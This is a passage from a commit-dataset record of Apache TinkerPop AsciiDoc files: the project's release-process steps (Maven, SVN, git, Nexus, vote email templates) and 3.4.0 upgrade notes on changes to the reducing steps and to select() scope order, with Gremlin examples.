link:https:\/\/repository.apache.org\/[Apache Nexus]. Review (artifacts versions, file sizes, anything that might be out of place - request another committer to review as well).\n. Review generated artifacts to be sure they have both javadocs and asciidocs present then \"close\" the repo - if the repo is left open it will be automatically dropped after five days and closing the repo will allow it to stay available for a full ninety days which is more than enough time to complete a vote. Do NOT \"release\" the repository at this time.\n. Upload artifacts to `https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop` for `[VOTE]` review.\n.. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop\/ dev` and `mkdir dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-console\/xx.yy.zz\/gremlin-console-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-server\/xx.yy.zz\/gremlin-server-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/tinkerpop-xx.yy.zz-source-release.zip* dev\/xx.yy.zz`\n.. `cd dev\/xx.yy.zz`\n.. pass:[<code>ls * | xargs -n1 -I {} echo \"mv apache-{} {}\" | sed -e 's\/distribution\/bin\/' -e 's\/source-release\/src\/' -e s'\/^\\(.*\\) \\(.*\\) \\(.*\\)$\/\\1 \\3 \\2\/' | \/bin\/bash<\/code>]\n.. `cd ..; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Execute `bin\/validate-distribution.sh` and any other relevant testing.\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. Perform JIRA administration tasks:\n.. \"Release\" the current version and set the \"release date\"\n.. If there is to be a follow on release in the current line of code, create that new version specifying the \"start date\"\n. Prepare Git administration tasks. Note that this work can be performed at the release manager's discretion. It may be wise to wait until a successful VOTE is eminent before reopening development. Apply the following steps as needed per release branch:\n.. Make the appropriate branching changes as required by the release and bump the version to `SNAPSHOT` with\n`mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false`.\n.. `mvn clean install -DskipTests` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n.. `mvn deploy` - deploy the new `SNAPSHOT`\n.. `bin\/process-docs.sh` and validate the generated `SNAPSHOT` documentation locally\n.. `bin\/publish-docs.sh <username>` to publish the `SNAPSHOT` docs which enables the README to work properly.\n.. Update the links in the `README.asciidoc` to point at the `SNAPSHOT` version.\n.. Commit and push the `SNAPSHOT` changes to git\n.. Send email to advise that code freeze is lifted.\n.. Generate a list of dead branches that will be automatically deleted and post them as a DISCUSS thread for review, then once consensus is reached removed those branches.\n. Submit for `[VOTE]` at `dev@tinkerpop.apache.org` (see email template below)\n. *Wait for vote acceptance* (72 hours)\n\nRelease & Promote\n-----------------\n\n. Login to link:https:\/\/repository.apache.org\/[Apache Nexus] and release the previously closed repository.\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop dev; svn up dev\/xx.yy.zz`\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/release\/tinkerpop release; mkdir release\/xx.yy.zz`\n. Copy release files from `dev\/xx.yy.zz` to `release\/xx.yy.zz`.\n. `cd release; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Update homepage with references to latest distribution and to other internal links elsewhere on the page.\n. Wait for Apache Central to sync the jars and src (link:http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/[http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/]).\n. If there are releases present in SVN that represents lines of code that are no longer under development, then remove those releases. In other words, if `3.2.0` is present and `3.2.1` is released then remove `3.2.0`. However, if `3.1.3` is present and that line of code is still under potential development, it may stay.\n. Announce release on `dev@`\/`gremlin-users@` mailing lists and tweet from `@apachetinkerpop`\n\nEmail Templates\n---------------\n\nRelease VOTE\n~~~~~~~~~~~~\n\n```\nSubject: [VOTE] TinkerPop xx.yy.zz Release\n\nHello,\n\nWe are happy to announce that TinkerPop xx.yy.zz is ready for release.\n\nThe release artifacts can be found at this location:\n\thttps:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/xx.yy.zz\/\n\nThe source distribution is provided by:\n\tapache-tinkerpop-xx.yy.zz-src.zip\n\nTwo binary distributions are provided for user convenience:\n\tapache-gremlin-console-xx.yy.zz-bin.zip\n\tapache-gremlin-server-xx.yy.zz-bin.zip\n\nThe GPG key used to sign the release artifacts is available at:\n https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/KEYS\n\nThe online docs can be found here:\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade\/ (upgrade docs)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\n\nThe tag in Apache Git can be found here:\n\thttps:\/\/git-wip-us.apache.org\/repos\/asf?p=tinkerpop.git;XXXXXXXXXXXXXXXXXX\n\nThe release notes are available here:\n\thttps:\/\/github.com\/apache\/tinkerpop\/blob\/master\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe [VOTE] will be open for the next 72 hours --- closing <DayOfTheWeek> (<Month> <Day> <Year>) at <Time> <TimeZone>.\n\nMy vote is +1.\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nDev Release RESULT VOTE\n~~~~~~~~~~~~~~~~~~~~~~~\n\n```\nSubject: [RESULT][VOTE] TinkerPop xx.yy.zz Release\n\nThis vote is now closed with a total of X +1s, no +0s and no -1s. The results are:\n\nBINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nNON-BINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nGeneral Release Announcement\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSubject: TinkerPop xx.yy.zz Released: [name of release line]\n\nHello,\n\nTinkerPop xx.yy.zz has just been released. [some text to introduce the release - e.g. whether or not\nthere is breaking change, an important game-changing feature or two, etc.]\n\nThe release artifacts can be found at this location:\n\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-console-xx.yy.zz-bin.zip\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-server-xx.yy.zz-bin.zip\n\nThe online docs can be found here:\n\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade.html#XXXXXXXXXXXXXXXXXX (upgrade docs)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/some-new-content\/ (some new content) [NEW!]\n\nThe release notes are available here:\n\nhttps:\/\/github.com\/apache\/tinkerpop\/blob\/xx.yy.zz\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe Central Maven repo has sync'd as well:\n\nhttps:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/\n\n[include the release line logo]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nRelease Process\n===============\n\nThis document describes the steps required to release a version of TinkerPop. The release is handled by a \"release\nmanager\" (a committer fulfills this role), who ensures that the steps in this document are executed. The process is\nmulti-phased and can therefore take several weeks to complete given the time needed for Apache voting and community\nfeedback. Once a release point has been identified, the following phases represent the flow of \"release\":\n\n* Pre-flight check.\n* Optionally, produce a release candidate for community feedback.\n* Submit the official release for PMC vote.\n* Release and promote.\n\nNOTE: It might be helpful to use this document as generated from the currently release as opposed to one generate\nfrom a previous version or from recent `SNAPSHOT`. When using one generated for release, all the \"versions\" in the\ncommands end up being set to the version that is being released, making cut and paste of those commands less labor\nintensive and error prone.\n\nPre-flight Check\n----------------\n\nThe \"pre-flight check\" is a list of things performed by the release manager during the weeks leading up to a scheduled\nday to release. These checks will help to ensure that that release day goes smoothly by identifying problems up early\nand communicating with other members of the community.\n\n. Fourteen days before release, issue an email to the dev mailing list to remind the community of the pending release.\n.. Note any important issues open in JIRA in that post.\n.. Request review and update of the \"upgrade documentation\" and CHANGELOG.\n. Seven days before release, announce the code freeze on the dev mailing list to remind the community that the branch\nunder release is protected. Tweaks to documentation and other odds and ends related to release are still allowed\nduring this period.\n. At some point during the week:\n.. Run the full integration test suite: `mvn clean install -DskipIntegrationTests=false -DincludeNeo4j`\n.. Deploy a final SNAPSHOT to the snapshot repository.\n.. Review LICENSE and NOTICE files to make sure that no <<dependencies,changes are needed>>.\n.. Review javadoc filters on the \"Core API\" docs to be sure nothing needs to change.\n.. Review JIRA tickets in the release and ensure that:\n... All tickets categorized by having a \"Component\" assigned.\n... All tickets are either of type \"Bug\" or \"Enhancement\".\n... All tickets where work was completed are \"Closed\"\n.... Search for \"closed the pull request\" in comments for hints on possible tickets that were left open by mistake).\n.... Look for tickets marked as \"Resolved\" (some users might not have rights to mark as \"Closed\" - convert these to \"Closed\".\n. When all documentation changes are in place, use `bin\/publish-docs.sh` to deploy a final `SNAPSHOT` representation\nof the docs and thus validate that there are no issues with the documentation generation process. Request review\nof the published documentation on the dev mailing list.\n\nRelease Candidate\n-----------------\n\nA release candidate is an unofficial release that is represented by a tagged version in the Git repository. It is\noffered in cases where there is significant change in a particular version and the potential for upgrades and problems\nmight be high.\n\n. `mvn clean install -DincludeNeo4j`\n.. `mvn verify -DskipIntegrationTests=false -DincludeNeo4j`\n.. `mvn verify -DskipPerformanceTests=false`\n. `bin\/publish-docs.sh <username>` - note that under a release candidate the documentation is published as SNAPSHOT\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update the project files to reference a non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and `git push`\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. `mvn clean install`\n. `mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false` to go back to SNAPSHOT\n. `git commit -a -m \"Returned to xx.yy.zz-SNAPSHOT\"` and `git push`\n. Announce the release candidate to `dev` mailing list and await feedback\n. Repeat as required or proceed to the next phase\n\nPMC Vote\n--------\n\nA positive vote for a particular release from the TinkerPop PMC is required to move to the following phase.\n\n. By this point, the testing performed during the code freeze should have validated the release. If however there\nare additional tests to perform that the release manager feels are relevant, they should be performed now. In other\nwords, there is no need to rebuild the `SNAPSHOT` yet another time unless there are circumstances that would call its\nvalidity into question.\n. Update `CHANGELOG.asciidoc`:\n.. Update the release date\n.. Generate the JIRA release notes report for the current version and append them to the `CHANGELOG.asciidoc`.\n... Use an \"advanced\" search to filter out JIRA issues already released on other versions. For example: `fixVersion\n= 3.1.0-incubating AND fixVersion not in (3.0.2-incubating, 3.0.1-incubating)`.\n... Consider use of an \"Excel\" export to organize, sort (by type and then id) and prepare the JIRA tickets to be pasted to `CHANGELOG.asciidoc`\n... Be sure to include a link to other versions in the `CHANGELOG.asciidoc` that were previously released while the\ncurrent release was under development as this new release will have those changes included within it. Please see\n3.1.0-incubating or 3.2.0-incubating for an example.\n.. Organize \"breaking\" changes to be clearly marked (use JIRA and the \"breaking\" label to identify those)\n. Update \"upgrade documentation\":\n.. Update the release date.\n.. Update the link to CHANGELOG.asciidoc\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update project files to reference the non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and push\n. `mvn clean install` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n. `bin\/process-docs.sh` and validate the generated documentation locally (don't rely on \"SUCCESS\" - scroll up through logs to ensure there were no errors and view the HTML directly)\n. `bin\/publish-docs.sh <username>` - Note that this step requires no additional processing as the previous step.\nhandled document generation and this step now merely needs to upload what was generated.\n. `mvn deploy -Papache-release -DcreateChecksum=true -DskipTests` - deploy signed artifacts with checksums to link:https:\/\/repository.apache.org\/[Apache Nexus]. Review (artifacts versions, file sizes, anything that might be out of place - request another committer to review as well).\n. Review generated artifacts to be sure they have both javadocs and asciidocs present then \"close\" the repo - if the repo is left open it will be automatically dropped after five days and closing the repo will allow it to stay available for a full ninety days which is more than enough time to complete a vote. Do NOT \"release\" the repository at this time.\n. Upload artifacts to `https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop` for `[VOTE]` review.\n.. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop\/ dev` and `mkdir dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-console\/xx.yy.zz\/gremlin-console-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-server\/xx.yy.zz\/gremlin-server-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/tinkerpop-xx.yy.zz-source-release.zip* dev\/xx.yy.zz`\n.. `cd dev\/xx.yy.zz`\n.. pass:[<code>ls * | xargs -n1 -I {} echo \"mv apache-{} {}\" | sed -e 's\/distribution\/bin\/' -e 's\/source-release\/src\/' -e s'\/^\\(.*\\) \\(.*\\) \\(.*\\)$\/\\1 \\3 \\2\/' | \/bin\/bash<\/code>]\n.. `cd ..; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Execute `bin\/validate-distribution.sh` and any other relevant testing.\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. Perform JIRA administration tasks:\n.. \"Release\" the current version and set the \"release date\"\n.. If there is to be a follow on release in the current line of code, create that new version specifying the \"start date\"\n. Prepare Git administration tasks. Note that this work can be performed at the release manager's discretion. It may be wise to wait until a successful VOTE is eminent before reopening development. Apply the following steps as needed per release branch:\n.. Make the appropriate branching changes as required by the release and bump the version to `SNAPSHOT` with\n`mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false`.\n.. `mvn clean install -DskipTests` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n.. `mvn deploy` - deploy the new `SNAPSHOT`\n.. `bin\/process-docs.sh` and validate the generated `SNAPSHOT` documentation locally\n.. `bin\/publish-docs.sh <username>` to publish the `SNAPSHOT` docs which enables the README to work properly.\n.. Update the links in the `README.asciidoc` to point at the `SNAPSHOT` version.\n.. Commit and push the `SNAPSHOT` changes to git\n.. Send email to advise that code freeze is lifted.\n.. Generate a list of dead branches that will be automatically deleted and post them as a DISCUSS thread for review, then once consensus is reached removed those branches.\n. Submit for `[VOTE]` at `dev@tinkerpop.apache.org` (see email template below)\n. *Wait for vote acceptance* (72 hours)\n\nRelease & Promote\n-----------------\n\n. Login to link:https:\/\/repository.apache.org\/[Apache Nexus] and release the previously closed repository.\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop dev; svn up dev\/xx.yy.zz`\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/release\/tinkerpop release; mkdir release\/xx.yy.zz`\n. Copy release files from `dev\/xx.yy.zz` to `release\/xx.yy.zz`.\n. `cd release; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Update homepage with references to latest distribution and to other internal links elsewhere on the page.\n. Wait for Apache Central to sync the jars and src (link:http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/[http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/]).\n. If there are releases present in SVN that represents lines of code that are no longer under development, then remove those releases. In other words, if `3.1.0-incubating` is present and `3.1.1-incubating` is released then remove `3.1.0-incubating`. However, if `3.0.2-incubating` is present and that line of code is still under potential development, it may stay.\n. Announce release on `dev@`\/`gremlin-users@` mailing lists and tweet from `@apachetinkerpop`\n\nEmail Templates\n---------------\n\nRelease VOTE\n~~~~~~~~~~~~\n\n```\nSubject: [VOTE] TinkerPop xx.yy.zz Release\n\nHello,\n\nWe are happy to announce that TinkerPop xx.yy.zz is ready for release.\n\nThe release artifacts can be found at this location:\n\thttps:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/xx.yy.zz\/\n\nThe source distribution is provided by:\n\tapache-tinkerpop-xx.yy.zz-src.zip\n\nTwo binary distributions are provided for user convenience:\n\tapache-gremlin-console-xx.yy.zz-bin.zip\n\tapache-gremlin-server-xx.yy.zz-bin.zip\n\nThe GPG key used to sign the release artifacts is available at:\n https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/KEYS\n\nThe online docs can be found here:\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade\/ (upgrade docs)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\n\nThe tag in Apache Git can be found here:\n\thttps:\/\/git-wip-us.apache.org\/repos\/asf?p=tinkerpop.git;XXXXXXXXXXXXXXXXXX\n\nThe release notes are available here:\n\thttps:\/\/github.com\/apache\/tinkerpop\/blob\/master\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe [VOTE] will be open for the next 72 hours --- closing <DayOfTheWeek> (<Month> <Day> <Year>) at <Time> <TimeZone>.\n\nMy vote is +1.\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nDev Release RESULT VOTE\n~~~~~~~~~~~~~~~~~~~~~~~\n\n```\nSubject: [RESULT][VOTE] TinkerPop xx.yy.zz Release\n\nThis vote is now closed with a total of X +1s, no +0s and no -1s. The results are:\n\nBINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nNON-BINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nGeneral Release Announcement\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSubject: TinkerPop xx.yy.zz Released: [name of release line]\n\nHello,\n\nTinkerPop xx.yy.zz has just been released. [some text to introduce the release - e.g. whether or not\nthere is breaking change, an important game-changing feature or two, etc.]\n\nThe release artifacts can be found at this location:\n\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-console-xx.yy.zz-bin.zip\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-server-xx.yy.zz-bin.zip\n\nThe online docs can be found here:\n\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade.html#XXXXXXXXXXXXXXXXXX (upgrade docs)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/some-new-content\/ (some new content) [NEW!]\n\nThe release notes are available here:\n\nhttps:\/\/github.com\/apache\/tinkerpop\/blob\/xx.yy.zz\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe Central Maven repo has sync'd as well:\n\nhttps:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/\n\n[include the release line logo]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abc11c8720b2eeb25163fdc1d9e86f0b4ab07d6f","subject":"added a note in upgrade docs regarding the change of order of select scopes","message":"added a note in upgrade docs regarding the change of order of select scopes\n","repos":"apache\/tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nNEED AN IMAGE\n\n*NOT NAMED YET*\n\n== TinkerPop 3.4.0\n\n*NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Modifications to reducing barrier steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input. Previously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these steps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in the result. In order to get the same result as before, one would\nhave to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Change in order of select() scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths\nPreviously the order was: side-effects, maps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name existed.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one would expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nNEED AN IMAGE\n\n*NOT NAMED YET*\n\n== TinkerPop 3.4.0\n\n*NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Modifications to reducing barrier steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input. Previously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these steps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in the result. In order to get the same result as before, one would\nhave to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> \ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bc9b6f5e49334173410bbc2ddc80884ee96ce63","subject":"Restructured upgrade docs for 3.4.0","message":"Restructured upgrade docs for 3.4.0\n\nMoved all deprecation\/removal sections under a single heading and retitled some of the sections. CTR\n","repos":"krlohnes\/tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this 